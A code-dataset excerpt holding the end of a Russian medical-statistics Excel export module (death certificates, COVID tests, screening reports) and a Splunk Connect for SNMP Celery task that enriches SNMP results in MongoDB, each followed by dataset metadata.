experise = expertise_final_data.get(i.get('issledovaniye_id', ""), "")
ws1.cell(row=r, column=34).value = experise
rows = ws1[f'A{r}:AH{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_death_data_card(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res_ca")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for i in researches:
if not i:
return ws1
try:
type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
except:
type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
if not type_doc_death:
continue
r += 1
ws1.cell(row=r, column=1).value = i["Серия"]
ws1.cell(row=r, column=2).value = i["Номер"]
ws1.cell(row=r, column=3).value = type_doc_death
ws1.cell(row=r, column=4).value = i["hosp_title"]
mo_attachment, mo_district = "-", "-"
if i.get("Прикрепление", None):
attachment_data = i.get("Прикрепление").split("—")
mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
mo_district = attachment_data[1]
ws1.cell(row=r, column=5).value = mo_attachment
ws1.cell(row=r, column=6).value = mo_district
ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
ws1.cell(row=r, column=8).value = i["Дата рождения"]
ws1.cell(row=r, column=9).value = i["fio_patient"]
ws1.cell(row=r, column=10).value = i["sex"]
d1 = du_parse(i["Дата смерти"])
try:
d2 = du_parse(i["Дата рождения"])
delta = relativedelta(d1, d2)
ws1.cell(row=r, column=11).value = delta.years
except:
ws1.cell(row=r, column=11).value = "-"
# а)
diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=13).value = diag_data[0]
ws1.cell(row=r, column=14).value = diag_data[1]["code"]
# б)
diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=16).value = diag_data[0]
ws1.cell(row=r, column=17).value = diag_data[1]["code"]
# в)
diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=19).value = diag_data[0]
ws1.cell(row=r, column=20).value = diag_data[1]["code"]
# г)
diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=22).value = diag_data[0]
ws1.cell(row=r, column=23).value = diag_data[1]["code"]
diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
ws1.cell(row=r, column=25).value = ""
place_death_details = ""
try:
place_death_details = json.loads(i["Место смерти"])
is_dict = True
if is_dict:
place_death_details = place_death_details.get("address", "-")
except:
is_dict = False
if not is_dict:
try:
place_death_details = i["Место смерти"].get("address", None)
is_dict = True
except:
is_dict = False
if not is_dict:
place_death_details = "-"
ws1.cell(row=r, column=26).value = place_death_details
# Название стационара
ws1.cell(row=r, column=27).value = i.get("МО", "")
# ДТП
ws1.cell(row=r, column=28).value = i["ДТП"]
ws1.cell(row=r, column=29).value = i["Беременность"]
if i.get("Заполнил", None):
who_write = i.get("Заполнил")
else:
who_write = ""
ws1.cell(row=r, column=30).value = who_write
try:
type_where_death = i["Типы мест наступления смерти"]["title"]
except:
type_where_death = "-"
ws1.cell(row=r, column=31).value = type_where_death
ws1.cell(row=r, column=32).value = i["hosp_okpo"]
ws1.cell(row=r, column=33).value = i["hosp_okato"]
rows = ws1[f'A{r}:AG{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_reserved_research_death_data(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res_rz")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for i in researches:
if not i:
return ws1
r += 1
if not i.get("Номер", ""):
continue
ws1.cell(row=r, column=1).value = i.get("hosp_title", "")
ws1.cell(row=r, column=2).value = i.get("Номер", "")
ws1.cell(row=r, column=3).value = i.get("date_create", "")
ws1.cell(row=r, column=4).value = i.get("fio_patient", "")
ws1.cell(row=r, column=5).value = i.get("napravleniye_id", "")
rows = ws1[f'A{r}:E{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_by_covid_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
columns = [
("№ заказа", 23),
("Название организации", 33),
("ОГРН организации", 33),
("Дата заказа", 23),
("Код услуги", 33),
("Название услуги", 33),
("Тест-система", 13),
("Дата взятия биоматериала", 13),
("Дата готовности результата", 13),
("Результат", 13),
("Тип исследования", 13),
("Значение результата", 33),
("Фамилия", 33),
("Имя", 33),
("Отчество", 33),
("Пол", 8),
("Дата рождения", 13),
("Телефон", 13),
("e-mail", 13),
("Тип ДУЛ", 13),
("Номер документа", 13),
("Серия документа", 13),
("СНИЛС", 23),
("ОМС", 23),
("Адрес регистрации регион", 23),
("Адрес регистрации район", 23),
("Адрес регистрации город", 23),
("Адрес регистрации улица", 23),
("Адрес регистрации дом", 23),
("Адрес регистрации строение", 23),
("Адрес регистрации квартира", 23),
("Адрес факт регион", 23),
("Адрес факт район", 23),
("Адрес факт город", 23),
("Адрес факт улица", 23),
("Адрес факт дом", 23),
("Адрес факт строение", 23),
("Адрес факт квартира", 23),
("Название лаборатории", 23),
("ОГРН лаборатории", 23),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=1, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=1, column=idx).style = style_border
return ws1
def statistic_research_by_covid_data(ws1, result_patient, patient_docs):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 1
if not result_patient:
return ws1
for i in result_patient:
r += 1
ws1.cell(row=r, column=1).value = i.dir_id
ws1.cell(row=r, column=2).value = i.hosp_title
ws1.cell(row=r, column=3).value = i.hosp_ogrn
ws1.cell(row=r, column=4).value = i.date_create
ws1.cell(row=r, column=5).value = i.research_code
ws1.cell(row=r, column=6).value = i.research_title
ws1.cell(row=r, column=7).value = ""
ws1.cell(row=r, column=8).value = i.date_reciev
ws1.cell(row=r, column=9).value = i.date_confirm
if i.value and i.method_title != "ИФА":
val_param = 0 if 'отриц' in i.value.lower() else 1
result_val = ""
else:
result_val = i.value
val_param = ""
ws1.cell(row=r, column=10).value = val_param
method_val = 2 if i.method_title == "ИФА" else 1
ws1.cell(row=r, column=11).value = method_val
ws1.cell(row=r, column=12).value = result_val
ws1.cell(row=r, column=13).value = i.family
ws1.cell(row=r, column=14).value = i.name
ws1.cell(row=r, column=15).value = i.patronymic
ws1.cell(row=r, column=16).value = 1 if i.sex.lower() == "м" else 2
ws1.cell(row=r, column=17).value = i.born
ws1.cell(row=r, column=18).value = ""
ws1.cell(row=r, column=19).value = ""
patient_doc = patient_docs.get(i.client_id, None)
type, serial, number, snils, polis = "", "", "", "", ""
if patient_doc:
for pat_doc in patient_doc:
for k, v in pat_doc.items():
if k == "снилс":
snils = v
elif k == "полис":
polis = v
elif "паспорт" in k.lower() or "рождение" in k.lower():
k_value = "Паспорт гражданина РФ" if "паспорт" in k.lower() else k
type = k_value
data = v.split("@")
serial = data[0]
number = data[1]
ws1.cell(row=r, column=20).value = type
ws1.cell(row=r, column=21).value = number
ws1.cell(row=r, column=22).value = serial
ws1.cell(row=r, column=23).value = snils
ws1.cell(row=r, column=24).value = polis
ws1.cell(row=r, column=25).value = "Иркутская область"
ws1.cell(row=r, column=39).value = i.hosp_title
ws1.cell(row=r, column=40).value = i.hosp_ogrn
rows = ws1[f'A{r}:C{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_by_sum_lab_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Лаборатория', 33),
('Услуга', 55),
('Кол-во', 25),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return
def statistic_research_by_sum_lab_data(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
if not researches:
return ws1
for i in researches:
r += 1
ws1.cell(row=r, column=1).value = i.lab_title
ws1.cell(row=r, column=2).value = i.research_title
ws1.cell(row=r, column=3).value = i.sum_research_id
rows = ws1[f'A{r}:C{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_by_details_lab_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('ID', 23),
('лаборатория', 15),
('анализ', 35),
('дата', 15),
('время', 15),
('аппарат', 15),
('дата взятия', 15),
('время взятия', 15),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_by_details_lab_data(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
if not researches:
return ws1
for i in researches:
r += 1
ws1.cell(row=r, column=1).value = i.napravleniye_id if i.napravleniye_id else ""
ws1.cell(row=r, column=2).value = i.lab_title if i.lab_title else ""
ws1.cell(row=r, column=3).value = i.research_title if i.research_title else ""
ws1.cell(row=r, column=4).value = i.date_confirm if i.date_confirm else ""
ws1.cell(row=r, column=5).value = i.time_confirm if i.time_confirm else ""
ws1.cell(row=r, column=6).value = i.name if i.name else ""
ws1.cell(row=r, column=7).value = i.date_tubes if i.date_tubes else ""
ws1.cell(row=r, column=8).value = i.time_tubes if i.time_tubes else ""
rows = ws1[f'A{r}:H{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_message_ticket_base(ws1, d1, d2, style_border):
ws1.cell(row=1, column=1).value = 'Обращения'
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('МО', 20),
('Номер', 20),
('Создано', 15),
('Физ. лицо', 26),
('Телефон', 20),
('Адрес', 20),
('Цель', 20),
('Примечания', 26),
('Статус', 16),
('Источник', 16),
('Создатель', 26),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_message_ticket_data(ws1, message_ticket_sql, style_border_res):
r = 4
purposes = dict(DoctorCall.PURPOSES)
statuses = dict(DoctorCall.STATUS)
for ticket in message_ticket_sql:
r += 1
ws1.cell(row=r, column=1).value = ticket.hospital_short_title or ticket.hospital_title
ws1.cell(row=r, column=2).value = ticket.external_num or ticket.num
ws1.cell(row=r, column=3).value = ticket.date_create
ws1.cell(row=r, column=4).value = f'{ticket.family} {ticket.name} {ticket.patronymic}'
ws1.cell(row=r, column=5).value = ticket.phone
ws1.cell(row=r, column=6).value = ticket.address
ws1.cell(row=r, column=7).value = purposes.get(ticket.purpose, '')
ws1.cell(row=r, column=8).value = ticket.comment
ws1.cell(row=r, column=9).value = statuses.get(ticket.status, '')
ws1.cell(row=r, column=10).value = 'интернет' if statuses.get(ticket.is_external) else 'оператор'
who_create = ""
if ticket.fio and ticket.short_title:
who_create = f"{ticket.fio}-{ticket.short_title}"
ws1.cell(row=r, column=11).value = who_create
rows = ws1[f'A{r}:K{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_message_purpose_total_data(ws1, message_total, d1, d2, style_border_res):
ws1.cell(row=1, column=1).value = 'Обращения'
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Цель', 20),
('Всего', 20),
('Выполнено', 20),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=5, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=5, column=idx).style = style_border_res
r = 5
r1 = r
purposes = dict(DoctorCall.PURPOSES)
for p in message_total:
r += 1
ws1.cell(row=r, column=1).value = purposes.get(p.total_purpose, '')
ws1.cell(row=r, column=2).value = p.sum_total_purpose
ws1.cell(row=r, column=3).value = p.sum_execute_purpose or ''
rows = ws1[f'A{r}:C{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
ws1.cell(row=r + 1, column=1).value = 'Итого'
ws1.cell(row=r + 1, column=1).style = style_border_res
ws1.cell(row=r + 1, column=2).value = f'=SUM(B{r1 + 1}:B{r})'
ws1.cell(row=r + 1, column=2).style = style_border_res
ws1.cell(row=r + 1, column=3).value = f'=SUM(C{r1 + 1}:C{r})'
ws1.cell(row=r + 1, column=3).style = style_border_res
return ws1
def statistic_screening_month_data(ws1, data, month, year, style_border_res):
ws1.cell(row=1, column=1).value = 'Скрининг'
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=2, column=2).value = f'{month_dict[int(month)]}-{year}'
size = 12
columns = [
('Месяц', 10),
('Число женщин 18-69 лет, проживающих на прикрепленной территории', size),
('Число женщин 30 -65 лет, подлежащих скринингу (всего)', size),
('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
('Число женщин 30-65 лет, прошедших скрининг', size),
('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
('Число женщин, которым выполнен ПАП-тест от общего числа прошедших скрининг', size),
('Число женщин, по препаратам которых получили цитологический результат', size),
('Из них, препараты признаны адекватными', size),
('Недостаточно адекватными', size),
('Не адекватными', size),
('Из числа женщин с недостаточно адекватным, неадекватным результатом, число вызванных женщин, у которых повторно взят материал на цитологическое исследование', size),
('В т.ч. АSCUS', size),
('В т.ч. легкое интраэпителиальное поражение CIN I, признаки ВПЧ', size),
('Умеренное интраэпителиальное поражение CIN I-II, II', size),
('Тяжелое интраэпителиальное поражение CIN II-III, III', size),
('cr in situ', size),
('Подозрение на ЗНО шейки матки', size),
('Всего по Папа-Николау', size),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=5, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=5, column=idx).style = style_border_res
ws1.cell(row=6, column=1).value = f'{month_dict[int(month)]}'
ws1.cell(row=6, column=1).style = style_border_res
for k, v in data.items():
if k == "attached_count_age_for_month":
ws1.cell(row=6, column=2).value = v
ws1.cell(row=6, column=2).style = style_border_res
if k == "count_regplan_for_month":
ws1.cell(row=6, column=3).value = v
ws1.cell(row=6, column=3).style = style_border_res
if k == "count_dispensarization_from_screening":
ws1.cell(row=6, column=4).value = v
ws1.cell(row=6, column=4).style = style_border_res
if k == "pass_screening":
ws1.cell(row=6, column=5).value = v
ws1.cell(row=6, column=5).style = style_border_res
if k == "pass_screening_in_dispensarization":
ws1.cell(row=6, column=6).value = v
ws1.cell(row=6, column=6).style = style_border_res
if k == "pass_pap_analysis":
ws1.cell(row=6, column=7).value = v
ws1.cell(row=6, column=7).style = style_border_res
if k == "pass_pap_adequate_result_value":
ws1.cell(row=6, column=9).value = v
ws1.cell(row=6, column=9).style = style_border_res
if k == "pass_pap_not_enough_adequate_result_value":
ws1.cell(row=6, column=10).value = v
ws1.cell(row=6, column=10).style = style_border_res
if k == "pass_pap_not_adequate_result_value":
ws1.cell(row=6, column=11).value = v
ws1.cell(row=6, column=11).style = style_border_res
if k == "count_people_dublicate":
ws1.cell(row=6, column=12).value = v
ws1.cell(row=6, column=12).style = style_border_res
if k == "pass_pap_ascus_result_value":
ws1.cell(row=6, column=13).value = v
ws1.cell(row=6, column=13).style = style_border_res
if k == "pass_pap_cin_i_result_value":
ws1.cell(row=6, column=14).value = v
ws1.cell(row=6, column=14).style = style_border_res
if k == "pass_pap_cin_i_ii_result_value":
ws1.cell(row=6, column=15).value = v
ws1.cell(row=6, column=15).style = style_border_res
if k == "pass_pap_cin_ii_iii_result_value":
ws1.cell(row=6, column=16).value = v
ws1.cell(row=6, column=16).style = style_border_res
if k == "pass_pap_cr_in_situ_result_value":
ws1.cell(row=6, column=17).value = v
ws1.cell(row=6, column=17).style = style_border_res
if k == "count_pap_analysys":
ws1.cell(row=6, column=19).value = v
ws1.cell(row=6, column=19).style = style_border_res
return ws1
def get_table_diagnos(diagnos_data, item):
diag_details = {}
period_data = ""
try:
diagnos_data[item].keys()
diag_data = diagnos_data[item]
except:
diag_data = json.loads(diagnos_data[item])
try:
diag_details = json.loads(diag_data["rows"][0][2])
period_data = f'{diag_data["rows"][0][0]} {diag_data["rows"][0][1]}'
is_dict = True
except:
is_dict = False
if not is_dict:
diag_details["code"] = "-"
diag_details["title"] = "-"
period_data = "-"
return (period_data, diag_details)
|
ru
| 0.285321
|
Основа(каркас) для итоговых данных :return: Заговловки видов работ :param ws1: :param titles: :return: :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек # ws1.row_dimensions[2].height = 85 Назначить ширину колонок. Вход worksheet выход worksheen с размерами Заголовки данных # Закголовки столбцов # i_obj - обеъект доктор # one_days = timedelta(1) # Порядок колонок в issled: # title, code, is_first_reception, polis_n, polis_who_give, \ # first_time, napravleniye_id, doc_confirmation_id, def_uet, co_executor_id, \ # co_executor_uet, co_executor2_id, co_executor2_uet, datetime_confirm, date_confirm, \ # time_confirm, maybe_onco, purpose, diagnos, iss_result, \ # outcome, card_number, client_family, client_name, client_patronymic, \ # birthday # current_datetime_confirm = issled[13] # current_count = 1 # current_price = '' res - результат выборки SQL порядок возврата: napr, date_confirm, time_confirm, create_date_napr, create_time_napr, doc_fio, coast, discount, how_many, ((coast + (coast/100 * discount)) * how_many)::NUMERIC(10,2) AS sum_money, ist_f, time_confirmation, num_card, ind_family, ind_name, patronymic, birthday, date_born, to_char(EXTRACT(YEAR from age(time_confirmation, date_born)), '999') as ind_age :return: :return: # а) # б) # в) # г) # Название стационара # ДТП :return: # а) # б) # в) # г) # Название стационара # ДТП :return: :return: :return: :return:
| 2.084481
| 2
|
splunk_connect_for_snmp/enrich/tasks.py
|
melord/splunk-connect-for-snmp
| 0
|
6628079
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from splunk_connect_for_snmp import customtaskmanager
try:
from dotenv import load_dotenv
load_dotenv()
except:
pass
import os
from hashlib import shake_128
import pymongo
from celery import Task, shared_task
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
MONGO_URI = os.getenv("MONGO_URI")
MONGO_DB = os.getenv("MONGO_DB", "sc4snmp")
TRACKED_F = [
"SNMPv2-MIB.sysDescr",
"SNMPv2-MIB.sysObjectID",
"SNMPv2-MIB.sysContact",
"SNMPv2-MIB.sysName",
"SNMPv2-MIB.sysLocation",
]
SYS_UP_TIME = "SNMPv2-MIB.sysUpTime"
MONGO_UPDATE_BATCH_THRESHOLD = 20
# check if sysUpTime decreased, if so trigger new walk
def check_restart(current_target, result, targets_collection, address):
for group_key, group_dict in result.items():
if "metrics" in group_dict and SYS_UP_TIME in group_dict["metrics"]:
sysuptime = group_dict["metrics"][SYS_UP_TIME]
new_value = sysuptime["value"]
logger.debug(f"current target = {current_target}")
if "sysUpTime" in current_target:
old_value = current_target["sysUpTime"]["value"]
logger.debug(f"new_value = {new_value} old_value = {old_value}")
if int(new_value) < int(old_value):
task_config = {
"name": f"sc4snmp;{address};walk",
"run_immediately": True,
}
logger.info(f"Detected restart of {address}, triggering walk")
periodic_obj = customtaskmanager.CustomPeriodicTaskManager()
periodic_obj.manage_task(**task_config)
state = {
"value": sysuptime["value"],
"type": sysuptime["type"],
"oid": sysuptime["oid"],
}
targets_collection.update_one(
{"address": address}, {"$set": {"sysUpTime": state}}, upsert=True
)
class EnrichTask(Task):
def __init__(self):
pass
@shared_task(bind=True, base=EnrichTask)
def enrich(self, result):
address = result["address"]
mongo_client = pymongo.MongoClient(MONGO_URI)
targets_collection = mongo_client.sc4snmp.targets
attributes_collection = mongo_client.sc4snmp.attributes
updates = []
attribute_updates = []
current_target = targets_collection.find_one(
{"address": address}, {"target": True, "sysUpTime": True}
)
if not current_target:
logger.info(f"First time for {address}")
current_target = {"address": address}
else:
logger.info(f"Not first time for {address}")
# TODO: Compare the ts field with the lastmodified time of record and only update if we are newer
check_restart(current_target, result["result"], targets_collection, address)
# First write back to DB new/changed data
for group_key, group_data in result["result"].items():
group_key_hash = shake_128(group_key.encode()).hexdigest(255)
current_attributes = attributes_collection.find_one(
{"address": address, "group_key_hash": group_key_hash},
{"fields": True, "id": True},
)
if not current_attributes and group_data["fields"]:
attributes_collection.update_one(
{"address": address, "group_key_hash": group_key_hash},
{"$set": {"id": group_key}},
upsert=True,
)
for field_key, field_value in group_data["fields"].items():
field_key_hash = shake_128(field_key.encode()).hexdigest(255)
field_value["name"] = field_key
cv = None
if current_attributes and field_key_hash in current_attributes.get(
"fields", {}
):
cv = current_attributes["fields"][field_key_hash]
if cv and not cv == field_value:
# modifed
attribute_updates.append(
{"$set": {"fields": {field_key_hash: field_value}}}
)
elif cv:
# unchanged
pass
else:
# new
attribute_updates.append(
{"$set": {"fields": {field_key_hash: field_value}}}
)
if field_key in TRACKED_F:
updates.append(
{"$set": {"state": {field_key.replace(".", "|"): field_value}}}
)
if len(updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
targets_collection.update_one(
{"address": address}, updates, upsert=True
)
updates.clear()
if len(attribute_updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
attributes_collection.update_one(
{
"address": address,
"group_key_hash": group_key_hash,
"id": group_key,
},
attribute_updates,
upsert=True,
)
attribute_updates.clear()
if updates:
targets_collection.update_one({"address": address}, updates, upsert=True)
updates.clear()
if attribute_updates:
attributes_collection.update_one(
{"address": address, "group_key_hash": group_key_hash, "id": group_key},
attribute_updates,
upsert=True,
)
attribute_updates.clear()
# Now add back any fields we need
if current_attributes:
attribute_group_id = current_attributes["id"]
fields = current_attributes["fields"]
if attribute_group_id in result["result"]:
for persist_data in fields.values():
if (
persist_data["name"]
not in result["result"][attribute_group_id]["fields"]
):
result["result"][attribute_group_id]["fields"][
persist_data["name"]
] = persist_data
return result
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from splunk_connect_for_snmp import customtaskmanager
try:
from dotenv import load_dotenv
load_dotenv()
except:
pass
import os
from hashlib import shake_128
import pymongo
from celery import Task, shared_task
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
MONGO_URI = os.getenv("MONGO_URI")
MONGO_DB = os.getenv("MONGO_DB", "sc4snmp")
TRACKED_F = [
"SNMPv2-MIB.sysDescr",
"SNMPv2-MIB.sysObjectID",
"SNMPv2-MIB.sysContact",
"SNMPv2-MIB.sysName",
"SNMPv2-MIB.sysLocation",
]
SYS_UP_TIME = "SNMPv2-MIB.sysUpTime"
MONGO_UPDATE_BATCH_THRESHOLD = 20
# check if sysUpTime decreased, if so trigger new walk
def check_restart(current_target, result, targets_collection, address):
for group_key, group_dict in result.items():
if "metrics" in group_dict and SYS_UP_TIME in group_dict["metrics"]:
sysuptime = group_dict["metrics"][SYS_UP_TIME]
new_value = sysuptime["value"]
logger.debug(f"current target = {current_target}")
if "sysUpTime" in current_target:
old_value = current_target["sysUpTime"]["value"]
logger.debug(f"new_value = {new_value} old_value = {old_value}")
if int(new_value) < int(old_value):
task_config = {
"name": f"sc4snmp;{address};walk",
"run_immediately": True,
}
logger.info(f"Detected restart of {address}, triggering walk")
periodic_obj = customtaskmanager.CustomPeriodicTaskManager()
periodic_obj.manage_task(**task_config)
state = {
"value": sysuptime["value"],
"type": sysuptime["type"],
"oid": sysuptime["oid"],
}
targets_collection.update_one(
{"address": address}, {"$set": {"sysUpTime": state}}, upsert=True
)
class EnrichTask(Task):
def __init__(self):
pass
@shared_task(bind=True, base=EnrichTask)
def enrich(self, result):
address = result["address"]
mongo_client = pymongo.MongoClient(MONGO_URI)
targets_collection = mongo_client.sc4snmp.targets
attributes_collection = mongo_client.sc4snmp.attributes
updates = []
attribute_updates = []
current_target = targets_collection.find_one(
{"address": address}, {"target": True, "sysUpTime": True}
)
if not current_target:
logger.info(f"First time for {address}")
current_target = {"address": address}
else:
logger.info(f"Not first time for {address}")
# TODO: Compare the ts field with the lastmodified time of record and only update if we are newer
check_restart(current_target, result["result"], targets_collection, address)
# First write back to DB new/changed data
for group_key, group_data in result["result"].items():
group_key_hash = shake_128(group_key.encode()).hexdigest(255)
current_attributes = attributes_collection.find_one(
{"address": address, "group_key_hash": group_key_hash},
{"fields": True, "id": True},
)
if not current_attributes and group_data["fields"]:
attributes_collection.update_one(
{"address": address, "group_key_hash": group_key_hash},
{"$set": {"id": group_key}},
upsert=True,
)
for field_key, field_value in group_data["fields"].items():
field_key_hash = shake_128(field_key.encode()).hexdigest(255)
field_value["name"] = field_key
cv = None
if current_attributes and field_key_hash in current_attributes.get(
"fields", {}
):
cv = current_attributes["fields"][field_key_hash]
if cv and not cv == field_value:
# modifed
attribute_updates.append(
{"$set": {"fields": {field_key_hash: field_value}}}
)
elif cv:
# unchanged
pass
else:
# new
attribute_updates.append(
{"$set": {"fields": {field_key_hash: field_value}}}
)
if field_key in TRACKED_F:
updates.append(
{"$set": {"state": {field_key.replace(".", "|"): field_value}}}
)
if len(updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
targets_collection.update_one(
{"address": address}, updates, upsert=True
)
updates.clear()
if len(attribute_updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
attributes_collection.update_one(
{
"address": address,
"group_key_hash": group_key_hash,
"id": group_key,
},
attribute_updates,
upsert=True,
)
attribute_updates.clear()
if updates:
targets_collection.update_one({"address": address}, updates, upsert=True)
updates.clear()
if attribute_updates:
attributes_collection.update_one(
{"address": address, "group_key_hash": group_key_hash, "id": group_key},
attribute_updates,
upsert=True,
)
attribute_updates.clear()
# Now add back any fields we need
if current_attributes:
attribute_group_id = current_attributes["id"]
fields = current_attributes["fields"]
if attribute_group_id in result["result"]:
for persist_data in fields.values():
if (
persist_data["name"]
not in result["result"][attribute_group_id]["fields"]
):
result["result"][attribute_group_id]["fields"][
persist_data["name"]
] = persist_data
return result
|
en
| 0.803392
|
# # Copyright 2021 Splunk Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # check if sysUpTime decreased, if so trigger new walk # TODO: Compare the ts field with the lastmodified time of record and only update if we are newer # First write back to DB new/changed data # modifed # unchanged # new # Now add back any fields we need
| 1.785046
| 2
|
